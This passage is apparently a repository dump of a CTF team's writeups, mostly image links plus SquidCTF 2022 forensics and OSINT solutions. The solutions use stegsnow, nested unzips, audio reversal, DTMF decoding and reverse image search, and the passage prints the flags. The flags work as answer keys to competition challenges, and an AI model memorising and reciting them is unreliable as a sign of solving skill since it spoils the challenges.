https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 31.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 32.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 32.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 33.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 33.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 34.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 34.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 35.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 35.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 36.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 36.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 37.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 37.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 38.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 38.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 39.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 39.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 40.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 40.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 41.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 41.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 42.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 42.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 43.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 43.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 44.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 44.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 45.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 45.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 46.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 46.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/img/ 47.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/img/ 47.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/QR Code From The Future/que.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/QR Code From The Future/que.png
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/README.md:
--------------------------------------------------------------------------------
1 | # KnightCTF | Steganography
2 |
3 | 
4 |
--------------------------------------------------------------------------------
/2022/KnightCTF/Steganography/Steganography.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/Steganography/Steganography.png
--------------------------------------------------------------------------------
/2022/KnightCTF/scoreboard2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/KnightCTF/scoreboard2.png
--------------------------------------------------------------------------------
/2022/SquidCTF/Forensics/Forensics.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/SquidCTF/Forensics/Forensics.png
--------------------------------------------------------------------------------
/2022/SquidCTF/Forensics/Is it or it isn’t [134]/README.md:
--------------------------------------------------------------------------------
1 | # Is It or It Isn't
2 |
3 | **Category**: Forensic \
4 | **Points**: 134
5 |
6 | ## Description
7 |
8 | > Here is the (or is it?) status for your position in the game:
9 |
10 | 
11 | ## Solution
12 |
13 | Given file is [txt](status.txt).
14 |
15 | Just use `stegsnow`.
16 |
17 | > You can use the [sol.sh](sol.sh) to get the flag.
18 |
19 | # Flag is `SCTF{YOU_ARE_ELIMINATED}`
20 |
21 |
--------------------------------------------------------------------------------
/2022/SquidCTF/Forensics/Is it or it isn’t [134]/flag.txt:
--------------------------------------------------------------------------------
1 | SCTF{YOU_ARE_ELIMINATED}
2 |
--------------------------------------------------------------------------------
/2022/SquidCTF/Forensics/Is it or it isn’t [134]/que.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/SquidCTF/Forensics/Is it or it isn’t [134]/que.png
--------------------------------------------------------------------------------
/2022/SquidCTF/Forensics/Is it or it isn’t [134]/sol.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | stegsnow -p frontman -C status.txt | awk '$0="SCTF{"$0"}"'
3 |
--------------------------------------------------------------------------------
/2022/SquidCTF/Forensics/Is it or it isn’t [134]/status.txt:
--------------------------------------------------------------------------------
1 | IMPOSE AS THE "frontman" TO KNOW YOUR GAME STATUS:
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/2022/SquidCTF/Forensics/It will take too long [104]/README.md:
--------------------------------------------------------------------------------
1 | # It will take too long
2 |
3 | **Category**: Forensic \
4 | **Points**: 50
5 |
6 | ## Description
7 |
8 | > Time is running out and the answer is behind 100 locked doors:
9 |
10 | 
11 | ## Solution
12 |
13 | Given file is [Zipped99.zip](Zipped99.zip).
14 |
15 | Just use `unzip` 100 times and get the flag.
16 |
17 | > You can use the [sol.sh](sol.sh) to get the flag.
18 |
19 | # Flag is `SCTF{TIM3_1S_RUNN1N6}`
20 |
21 |
--------------------------------------------------------------------------------
/2022/SquidCTF/Forensics/It will take too long [104]/Zipped99.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/SquidCTF/Forensics/It will take too long [104]/Zipped99.zip
--------------------------------------------------------------------------------
/2022/SquidCTF/Forensics/It will take too long [104]/flag.txt:
--------------------------------------------------------------------------------
1 | SCTF{TIM3_1S_RUNN1N6}
--------------------------------------------------------------------------------
/2022/SquidCTF/Forensics/It will take too long [104]/que.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/SquidCTF/Forensics/It will take too long [104]/que.png
--------------------------------------------------------------------------------
/2022/SquidCTF/Forensics/It will take too long [104]/sol.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | for ((i = 100; i > 0; i--)); do
3 | if [ ! -f "Zipped$i.zip" ]; then
4 | break
5 | fi
6 | unzip Zipped$i.zip
7 | rm Zipped$i.zip
8 | done
9 | clear
10 | cat flag.txt
11 | echo ""
12 |
--------------------------------------------------------------------------------
/2022/SquidCTF/Forensics/Player 001 [30]/README.md:
--------------------------------------------------------------------------------
1 | # Player 001
2 |
3 | **Category**: Forensic \
4 | **Points**: 30
5 |
6 | ## Description
7 |
8 | > This could be a reason why Player 001 never played the last game: We think he had:
9 |
10 | 
11 | ## Solution
12 |
13 | Given file is [confidential.mp3](confidential.mp3).
14 |
15 | It's a reversed mp3 so, just reverse it and you can hear the flag.
16 |
17 | After reversing it I got: [confidential_(rev).mp3](confidential_(rev).mp3).
18 |
19 | > You can use the [mp3cut.net](https://mp3cut.net/reverse-audio) to reverse the mp3.
20 |
21 | # Flag is `SCTF{squid_allergy}`
22 |
23 |
--------------------------------------------------------------------------------
/2022/SquidCTF/Forensics/Player 001 [30]/confidential.mp3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/SquidCTF/Forensics/Player 001 [30]/confidential.mp3
--------------------------------------------------------------------------------
/2022/SquidCTF/Forensics/Player 001 [30]/confidential_(rev).mp3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/SquidCTF/Forensics/Player 001 [30]/confidential_(rev).mp3
--------------------------------------------------------------------------------
/2022/SquidCTF/Forensics/Player 001 [30]/flag.txt:
--------------------------------------------------------------------------------
1 | SCTF{squid_allergy}
2 |
--------------------------------------------------------------------------------
/2022/SquidCTF/Forensics/Player 001 [30]/que.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/SquidCTF/Forensics/Player 001 [30]/que.png
--------------------------------------------------------------------------------
/2022/SquidCTF/Forensics/README.md:
--------------------------------------------------------------------------------
1 | # SquidCTF | Forensics
2 |
3 | 
4 |
--------------------------------------------------------------------------------
/2022/SquidCTF/OSINT/Anonymous Call [140]/README.md:
--------------------------------------------------------------------------------
1 | # Anonymous Call
2 |
3 | **Category**: OSINT \
4 | **Points**: 140
5 |
6 | ## Description
7 |
8 | > After the final game , Seung-Gi-Hun gets a call from an anonymous phone no. on his *old phone*. After being hesitant at first he picks up and a strange noise is heard from the other end. At last an old man’s voice is heard saying Find your money. Help seung -gi-hun to get his reward.
9 |
10 | 
11 | ## Solution
12 |
13 | Given file is [hello.wav](hello.wav).
14 |
15 | using [dtmf-decoder](https://github.com/ribt/dtmf-decoder), I got
16 | ``83678470123674877519584489584824952789553845284494878125``
17 |
18 | decode it *from decimal to ascii* (https://onlineasciitools.com/convert-decimal-to-ascii)
19 |
20 | 
21 |
22 | # Flag is `SCTF{C0M3_T0_TR14N_5T4T10N}`
23 |
24 |
--------------------------------------------------------------------------------
/2022/SquidCTF/OSINT/Anonymous Call [140]/dec-to-ascii.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/SquidCTF/OSINT/Anonymous Call [140]/dec-to-ascii.png
--------------------------------------------------------------------------------
/2022/SquidCTF/OSINT/Anonymous Call [140]/flag.txt:
--------------------------------------------------------------------------------
1 | SCTF{C0M3_T0_TR14N_5T4T10N}
2 |
--------------------------------------------------------------------------------
/2022/SquidCTF/OSINT/Anonymous Call [140]/hello.wav:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/SquidCTF/OSINT/Anonymous Call [140]/hello.wav
--------------------------------------------------------------------------------
/2022/SquidCTF/OSINT/Anonymous Call [140]/que.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/SquidCTF/OSINT/Anonymous Call [140]/que.png
--------------------------------------------------------------------------------
/2022/SquidCTF/OSINT/Belarus [20]/README.md:
--------------------------------------------------------------------------------
1 | # Belarus
2 |
3 | **Category**: OSINT \
4 | **Points**: 20
5 |
6 | ## Description
7 |
8 | > Find the nearest station to the place where this photo was taken:
9 |
10 | Flag format:- SCTF{station_name_all_small_without_spaces}
11 |
12 | 
13 | ## Solution
14 |
15 | Given file is
16 |
17 | .
18 |
19 | Using reverse image lookup, I got the same image with good quality
20 | .
21 |
22 | By looking closer, I got a name `English National Ballet`.
23 | 
24 |
25 | Searched it on google map and got this:
26 | 
27 |
28 | The google map shows that the nearest train station is "Canning Town" which is the flag.
29 | 
30 |
31 | # Flag is `SCTF{canningtown}`
32 |
33 |
--------------------------------------------------------------------------------
/2022/SquidCTF/OSINT/Belarus [20]/flag.txt:
--------------------------------------------------------------------------------
1 | SCTF{canningtown}
2 |
--------------------------------------------------------------------------------
/2022/SquidCTF/OSINT/Belarus [20]/image.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/SquidCTF/OSINT/Belarus [20]/image.png
--------------------------------------------------------------------------------
/2022/SquidCTF/OSINT/Belarus [20]/image_good_quality.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/SquidCTF/OSINT/Belarus [20]/image_good_quality.png
--------------------------------------------------------------------------------
/2022/SquidCTF/OSINT/Belarus [20]/image_map.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/SquidCTF/OSINT/Belarus [20]/image_map.png
--------------------------------------------------------------------------------
/2022/SquidCTF/OSINT/Belarus [20]/image_station.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/SquidCTF/OSINT/Belarus [20]/image_station.png
--------------------------------------------------------------------------------
/2022/SquidCTF/OSINT/Belarus [20]/image_zoom.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/SquidCTF/OSINT/Belarus [20]/image_zoom.png
--------------------------------------------------------------------------------
/2022/SquidCTF/OSINT/Belarus [20]/que.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/SquidCTF/OSINT/Belarus [20]/que.png
--------------------------------------------------------------------------------
/2022/SquidCTF/OSINT/OSINT.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/SquidCTF/OSINT/OSINT.png
--------------------------------------------------------------------------------
/2022/SquidCTF/OSINT/README.md:
--------------------------------------------------------------------------------
1 | # SquidCTF | OSINT
2 |
3 | 
4 |
--------------------------------------------------------------------------------
/2022/SquidCTF/README.md:
--------------------------------------------------------------------------------
1 | # SquidCTF 2022
2 |
3 | **Site** : https://squidctf2022.cf
4 |
5 | **Rank** : 1 / 75
6 |
7 | 
8 |
--------------------------------------------------------------------------------
/2022/SquidCTF/scoreboard.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2022/SquidCTF/scoreboard.png
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Red Knights CTF Writeups :warning:
2 |
3 | | CTF | Rank |
4 | |:--------------------------------------------------|----------:|
5 | | [Hayyim CTF 2022](2022/HayyimCTF/) | 12/86 |
6 | | [DefCamp CTF 21-22](2022/DefCampCTF/) | 18/1035 |
7 | | [Cyber Grabs CTF 2022](2022/CybergrabsCTF/) | 3/285 |
8 | | [Knight CTF 2022](2022/KnightCTF/) | 18 / 752 |
9 | | [Squid CTF 2022](2022/SquidCTF/) | 1 / 75 |
10 | | [Cybergrab CTF 2021](2021/cybergrab_ctf/) | 9 / 224 |
11 | | [SunshineCTF 2020](2020/sunshine_ctf/) | 17 / 742 |
12 | | [Affinity CTF Lite 2020](2020/affinity_ctf_lite/) | 5 / 689 |
13 | | [Dragon CTF 2020](2020/dragon_ctf/) | 107 / 539 |
14 | | [InterIUT_CTF_2020](2020/InterIUT_ctf/) | 5 / 87 |
15 | | [Boot2Root_CTF_2020](2020/Boot2root_ctf/) | 9 / 124 |
16 | | [Asis_CTF_2020](2020/asis_ctf/) | 64 / 351 |
17 | | [Vulnfreak_CTF_2020](2020/vulnfreak_ctf/) | 4 / 81 |
18 |
19 |
--------------------------------------------------------------------------------